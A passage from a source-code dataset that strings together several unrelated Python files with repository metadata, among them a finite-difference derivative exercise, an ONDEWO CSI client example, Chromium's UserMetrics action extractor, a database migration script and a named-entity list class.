b = 1.2 # extremo superior del intervalo
x = np.arange(a,b+h,h) # vector con 1º coordenada a, última coordenanda b y diferencia entre coordenadas h
# Diferencias progresiva y regresivas
df_p = np.diff(f(x))/h # vector que contiene los valores de las diferencias progresivas
df_r = df_p # vector que contiene los valores de las diferencias regresivas
# Para los puntos interiores con aproximación centrada
df_c = (df_p[1:] + df_r[0:-1])/2
# Extremo izquierdo con aproximación progresiva (orden 1)
df_a = df_p[0]
# Extremo derecho con aproximación regresiva (orden 1)
df_b = df_r[-1]
# Construimos un vector que contenga todos los valores de la der. num de orden 1
# El vector será de la forma [aprox. en extremo izdo, aprox. en puntos interiores, aprox. en extremo dcho.]
df_a = np.array([df_a]) # transformamos df_a en un vector
df_b = np.array([df_b]) # transformamos df_b en un vector
Aprox_1 = np.concatenate((df_a,df_c,df_b)) # vector que contiene los valores de la der. num. de orden 1
Error_1 = np.linalg.norm(df(x)-Aprox_1)/np.linalg.norm(df(x)) # error de orden 1
print("Error con derivacion de orden 1 = ",Error_1) # escribimos el error en pantalla
#---------------------------------------------------------------
# Derivación numérica de orden 2
#---------------------------------------------------------------
# Para los puntos interiores la aproximación centrada es la misma que en el caso anterior
# Extremo izquierdo: aproximación progresiva (orden 2)
df_a2 = (-3*f(x[0])+4*f(x[0]+h)-f(x[0]+2*h))/(2*h)
# Extremo derecho: aproximación regresiva (orden 2)
df_b2 = (f(x[-1]-2*h)-4*f(x[-1]-h)+3*f(x[-1]))/(2*h)
# Construimos un vector que contenga todos los valores de la der. num de orden 2
# El vector será de la forma [aprox. en extremo izdo, aprox. en puntos interiores, aprox. en extremo dcho.]
df_a2 = np.array([df_a2]) # transformamos df_a2 en un vector
df_b2 = np.array([df_b2]) # transformamos df_b2 en un vector
Aprox_2 = np.concatenate((df_a2,df_c,df_b2)) # vector que contiene los valores de la der. num. de orden 2
Error_2 = np.linalg.norm(df(x)-Aprox_2)/np.linalg.norm(df(x)) # error de orden 2
print("Error con derivacion de orden 2 = ",Error_2) # escribimos el error en pantalla
| 43.507692 | 110 | 0.631542 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,017 | 0.708465 |
6381338cf437e2f23817a23137a8ed44d42f412e | 1,982 | py | Python | examples/multi_client_example.py | ondewo/ondewo-csi-client-python | 5ba00402d7d28374f49eb485dd6ed661ebc446f2 | [
"Apache-2.0"
] | null | null | null | examples/multi_client_example.py | ondewo/ondewo-csi-client-python | 5ba00402d7d28374f49eb485dd6ed661ebc446f2 | [
"Apache-2.0"
] | 2 | 2021-05-25T09:18:32.000Z | 2021-07-02T10:14:29.000Z | examples/multi_client_example.py | ondewo/ondewo-csi-client-python | 5ba00402d7d28374f49eb485dd6ed661ebc446f2 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
#
# Copyright 2021 ONDEWO GmbH
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ondewo.nlu.agent_pb2 as agent
import ondewo.s2t.speech_to_text_pb2 as s2t
import ondewo.t2s.text_to_speech_pb2 as t2s
from ondewo.nlu.client import Client as NluClient
from ondewo.nlu.client_config import ClientConfig as NluClientConfig
from ondewo.s2t.client.client import Client as S2tClient
from ondewo.t2s.client.client import Client as T2sClient
from ondewo.csi.client.client import Client as CsiClient
from ondewo.csi.client.client_config import ClientConfig
with open("csi.json") as fi:
config = ClientConfig.from_json(fi.read())
with open("csi.json") as fi:
nlu_config = NluClientConfig.from_json(fi.read())
csi_client = CsiClient(config=config)
s2t_client = S2tClient(config=config)
t2s_client = T2sClient(config=config)
nlu_client = NluClient(config=nlu_config)
s2t_pipelines = s2t_client.services.speech_to_text.list_s2t_pipelines(request=s2t.ListS2tPipelinesRequest())
t2s_pipelines = t2s_client.services.text_to_speech.list_t2s_pipelines(request=t2s.ListT2sPipelinesRequest())
print(f"Speech to text pipelines: {[pipeline.id for pipeline in s2t_pipelines.pipeline_configs]}")
print(f"Text to speech pipelines: {[pipeline.id for pipeline in t2s_pipelines.pipelines]}")
agents = nlu_client.services.agents.list_agents(request=agent.ListAgentsRequest())
print(f"Nlu agents: {[agent.agent.parent for agent in agents.agents_with_owners]}")
| 41.291667 | 108 | 0.799697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 866 | 0.436932 |
63819767d87fb2523fcafd5031ccca5b56c6122d | 4,149 | py | Python | chrome/tools/extract_actions.py | zachlatta/chromium | c4625eefca763df86471d798ee5a4a054b4716ae | [
"BSD-3-Clause"
] | 1 | 2021-09-24T22:49:10.000Z | 2021-09-24T22:49:10.000Z | chrome/tools/extract_actions.py | changbai1980/chromium | c4625eefca763df86471d798ee5a4a054b4716ae | [
"BSD-3-Clause"
] | null | null | null | chrome/tools/extract_actions.py | changbai1980/chromium | c4625eefca763df86471d798ee5a4a054b4716ae | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
# Copyright 2007 Google Inc. All rights reserved.
"""Extract UserMetrics "actions" strings from the Chrome source.
This program generates the list of known actions we expect to see in the
user behavior logs. It walks the Chrome source, looking for calls to
UserMetrics functions, extracting actions and warning on improper calls,
as well as generating the lists of possible actions in situations where
there are many possible actions.
See also:
chrome/browser/user_metrics.h
http://wiki.corp.google.com/twiki/bin/view/Main/ChromeUserExperienceMetrics
Run it from the chrome/browser directory like:
extract_actions.py > actions_list
"""
__author__ = 'evanm (Evan Martin)'
import os
import re
import sys
from google import path_utils
# Files that are known to use UserMetrics::RecordComputedAction(), which means
# they require special handling code in this script.
# To add a new file, add it to this list and add the appropriate logic to
# generate the known actions to AddComputedActions() below.
KNOWN_COMPUTED_USERS = [
'back_forward_menu_model.cc',
'options_page_view.cc',
'render_view_host.cc', # called using webkit identifiers
'user_metrics.cc', # method definition
'new_tab_ui.cc', # most visited clicks 1-9
]
def AddComputedActions(actions):
"""Add computed actions to the actions list.
Arguments:
actions: set of actions to add to.
"""
# Actions for back_forward_menu_model.cc.
for dir in ['BackMenu_', 'ForwardMenu_']:
actions.add(dir + 'ShowFullHistory')
actions.add(dir + 'Popup')
for i in range(1, 20):
actions.add(dir + 'HistoryClick' + str(i))
actions.add(dir + 'ChapterClick' + str(i))
# Actions for new_tab_ui.cc.
for i in range(1, 10):
actions.add('MostVisited%d' % i)
def AddWebKitEditorActions(actions):
"""Add editor actions from editor_client_impl.cc.
Arguments:
actions: set of actions to add to.
"""
action_re = re.compile(r'''\{ [\w']+, +\w+, +"(.*)" +\},''')
editor_file = os.path.join(path_utils.ScriptDir(), '..', '..', 'webkit',
'glue', 'editor_client_impl.cc')
for line in open(editor_file):
match = action_re.search(line)
if match: # Plain call to RecordAction
actions.add(match.group(1))
def GrepForActions(path, actions):
"""Grep a source file for calls to UserMetrics functions.
Arguments:
path: path to the file
actions: set of actions to add to
"""
action_re = re.compile(r'[> ]UserMetrics:?:?RecordAction\(L"(.*)"')
other_action_re = re.compile(r'[> ]UserMetrics:?:?RecordAction\(')
computed_action_re = re.compile(r'UserMetrics::RecordComputedAction')
for line in open(path):
match = action_re.search(line)
if match: # Plain call to RecordAction
actions.add(match.group(1))
elif other_action_re.search(line):
# Warn if this file shouldn't be mentioning RecordAction.
if os.path.basename(path) != 'user_metrics.cc':
print >>sys.stderr, 'WARNING: %s has funny RecordAction' % path
elif computed_action_re.search(line):
# Warn if this file shouldn't be calling RecordComputedAction.
if os.path.basename(path) not in KNOWN_COMPUTED_USERS:
print >>sys.stderr, 'WARNING: %s has RecordComputedAction' % path
def WalkDirectory(root_path, actions):
for path, dirs, files in os.walk(root_path):
if '.svn' in dirs:
dirs.remove('.svn')
for file in files:
ext = os.path.splitext(file)[1]
if ext == '.cc':
GrepForActions(os.path.join(path, file), actions)
def main(argv):
actions = set()
AddComputedActions(actions)
AddWebKitEditorActions(actions)
# Walk the source tree to process all .cc files.
chrome_root = os.path.join(path_utils.ScriptDir(), '..')
WalkDirectory(chrome_root, actions)
webkit_root = os.path.join(path_utils.ScriptDir(), '..', '..', 'webkit')
WalkDirectory(os.path.join(webkit_root, 'glue'), actions)
WalkDirectory(os.path.join(webkit_root, 'port'), actions)
# Print out the actions as a sorted list.
for action in sorted(actions):
print action
if '__main__' == __name__:
main(sys.argv)
| 33.192 | 78 | 0.699446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,249 | 0.542058 |
6381feead03b8bd48b3416770eed49408794f57c | 1,817 | py | Python | hamgr/bin/hamgr-manage.py | platform9/pf9-ha | 7d64f9fe6b72fb4c1e5ed5d23e372a62c9e218a8 | [
"Apache-2.0"
] | 11 | 2016-09-06T09:59:29.000Z | 2021-10-02T07:24:07.000Z | hamgr/bin/hamgr-manage.py | platform9/pf9-ha | 7d64f9fe6b72fb4c1e5ed5d23e372a62c9e218a8 | [
"Apache-2.0"
] | 5 | 2017-10-16T06:47:14.000Z | 2020-07-06T07:20:13.000Z | hamgr/bin/hamgr-manage.py | platform9/pf9-ha | 7d64f9fe6b72fb4c1e5ed5d23e372a62c9e218a8 | [
"Apache-2.0"
] | 3 | 2016-09-01T06:20:51.000Z | 2017-10-16T02:27:07.000Z | #!/bin/env python
# Copyright (c) 2019 Platform9 Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from migrate.exceptions import DatabaseAlreadyControlledError
from migrate.versioning.api import upgrade
from migrate.versioning.api import version_control
from six.moves.configparser import ConfigParser
def _get_arg_parser():
parser = argparse.ArgumentParser(
description="High Availability Manager for VirtualMachines")
parser.add_argument('--config-file', dest='config_file',
default='/etc/pf9/hamgr/hamgr.conf')
parser.add_argument('--command', dest='command', default='db_sync')
return parser.parse_args()
def _version_control(conf):
try:
version_control(conf.get("database", "sqlconnectURI"),
conf.get("database", "repo"))
except DatabaseAlreadyControlledError:
# Ignore the already controlled error
pass
if __name__ == '__main__':
parser = _get_arg_parser()
conf = ConfigParser()
conf.readfp(open(parser.config_file))
if parser.command == 'db_sync':
_version_control(conf)
upgrade(conf.get("database", "sqlconnectURI"),
conf.get("database", "repo"))
exit(0)
else:
print('Unknown command')
exit(1)
| 33.036364 | 74 | 0.698954 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 880 | 0.484315 |
638271269c493149415ea03cdea0dc60c36a233d | 2,898 | py | Python | src/nerb/named_entities.py | johnnygreco/nerb | 1ea395bade7d58b176c965d062987284a2d6f590 | [
"MIT"
] | null | null | null | src/nerb/named_entities.py | johnnygreco/nerb | 1ea395bade7d58b176c965d062987284a2d6f590 | [
"MIT"
] | null | null | null | src/nerb/named_entities.py | johnnygreco/nerb | 1ea395bade7d58b176c965d062987284a2d6f590 | [
"MIT"
] | null | null | null | from __future__ import annotations
# Standard library
import re
from copy import deepcopy
from dataclasses import dataclass
from typing import Callable, Optional
__all__ = ['NamedEntity', 'NamedEntityList']
@dataclass(frozen=True)
class NamedEntity:
name: str
entity: str
string: str
span: tuple[int, int]
class NamedEntityList:
"""Named entity list class."""
def __init__(self, init_list: Optional[list] = None):
init_list = [] if init_list is None else init_list
self._list = init_list
def append(self, entity: NamedEntity):
"""Append entity to this list, where the element must be of type NamedEntity."""
if not isinstance(entity, NamedEntity):
raise TypeError(
f'{self.__class__.__name__} holds {NamedEntity} objects. You gave {type(entity)}.')
self._list.append(entity)
def copy(self):
return deepcopy(self)
def extend(self, entity_list: NamedEntityList | list[NamedEntity]):
"""Extend list. Similar to the standard python list object, extend takes an iterable as an argument."""
if not isinstance(entity_list, (NamedEntityList, list)):
raise TypeError(
f'Expected object of type {self.__class__.__name__} or list. You gave {type(entity_list)}.'
)
for elem in entity_list:
self.append(elem)
def get_unique_names(self) -> set[str]:
"""Return set of the unique names in this NamedEntityList."""
return set([entity.name for entity in self])
def sort(self, key: Callable, *, reverse: bool = False) -> None:
"""
Sort the list according to the given key. The sort is executed in-place.
Parameters
----------
key : callable (e.g., a lambda function)
Function that defines how the list should be sorted.
reverse : bool, optional
If True, sort in descending order.
"""
self._list.sort(key=key, reverse=reverse)
def __add__(self, other: NamedEntityList):
"""Define what it means to add two list objects together."""
concatenated_list = list(self) + list(other)
return self.__class__(concatenated_list)
def __getitem__(self, item):
if isinstance(item, list):
return self.__class__([self._list[i] for i in item])
elif isinstance(item, slice):
return self.__class__(self._list[item])
else:
return self._list[item]
def __iter__(self):
return iter(self._list)
def __len__(self):
return len(self._list)
def __repr__(self):
repr = '\n'.join([f'[{i}] {p.__repr__()}' for i, p in enumerate(self)])
repr = re.sub(r'^', ' ' * 4, repr, flags=re.M)
repr = f'(\n{repr}\n)' if len(self) > 0 else f'([])'
return f'{self.__class__.__name__}{repr}'
| 32.561798 | 111 | 0.622498 | 2,658 | 0.917184 | 0 | 0 | 114 | 0.039337 | 0 | 0 | 974 | 0.336094 |